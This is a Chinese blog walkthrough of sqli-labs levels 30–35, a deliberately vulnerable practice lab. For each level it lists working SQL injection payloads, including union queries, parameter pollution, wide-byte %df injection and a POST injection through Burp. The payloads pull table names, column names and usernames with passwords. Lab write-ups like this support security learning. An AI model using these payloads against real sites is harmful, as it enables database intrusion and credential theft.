sqlilabs第三十关到第三十五关靶场攻略

第三十关

第三十关和二十九关差不多,将单引号换成双引号

查询表名,字段名,数据

复制代码
?id=1&id=-2" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
复制代码
?id=1&id=-2" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+
复制代码
?id=1&id=-2" union select 1,group_concat(password,username),3 from users--+

第三十一关

查询数据库名

查询表名

复制代码
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

普通的联合注入( 如果不行,可以尝试一下?id=1&id=-1") )

照正常流程走就好了

第三十二关(宽字节注入)

在1后面加%df让他成为一个字符

复制代码
?id=-1%df' union select 1,2,database()--+

后面还是联合查询一样的流程

第三十三关

跟三十二一样都是宽字节注入\

复制代码
?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
复制代码
?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+

第三十四关

这关还是宽字节注入,可以到是POST提交

我们到bp重放器进行注入

复制代码
admin%df' union select 1,group_concat(table_name)from information_schema.tables where table_schema=database() #

继续联合注入就行

第三十五关

数字型的宽字节注入但是这关不需要%df

直接联合注入就拿下这关

复制代码
?id=-1 union select 1,2,database()--+
复制代码
?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database() #
复制代码
?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273 #
相关推荐
TPBoreas18 分钟前
MySQL性能优化面试全攻略
mysql·面试·性能优化
xlq223221 小时前
11.表的内外连接,索引
mysql
AllData公司负责人1 小时前
数据库同步平台|AIIData数据中台实现OceanBase、达梦数据库、OpenGauss、人大金仓、Hive、TDengine 一键接入Doris
大数据·数据库·hive·mysql·oceanbase·tdengine
2603_954708311 小时前
全维度容错设计,打造微电网安全运行屏障
服务器·网络·数据库·人工智能·分布式·安全
IvorySQL2 小时前
从双解析器到循环工程:IvorySQL 五年技术演进路线的深度观察
大数据·数据库·人工智能·postgresql·开源
wefg12 小时前
【MySQL】事务
数据库·mysql
黑白极客2 小时前
mysql的高可用性
数据库·mysql
一十九的酒2 小时前
Oracle 12c 标准版无缝升级企业版实战记录
数据库·oracle·标准版切换到企业版
ZhengEnCi3 小时前
S02-SpringBoot实体类新增字段对已有数据的影响及自动DDL同步机制详解
数据库·spring boot
妙码生花3 小时前
从 PHP 到 AI + Golang,程序员自救转型手记(三十二):增加 admin_rule 模型及数据表迁移
数据库·go·ai编程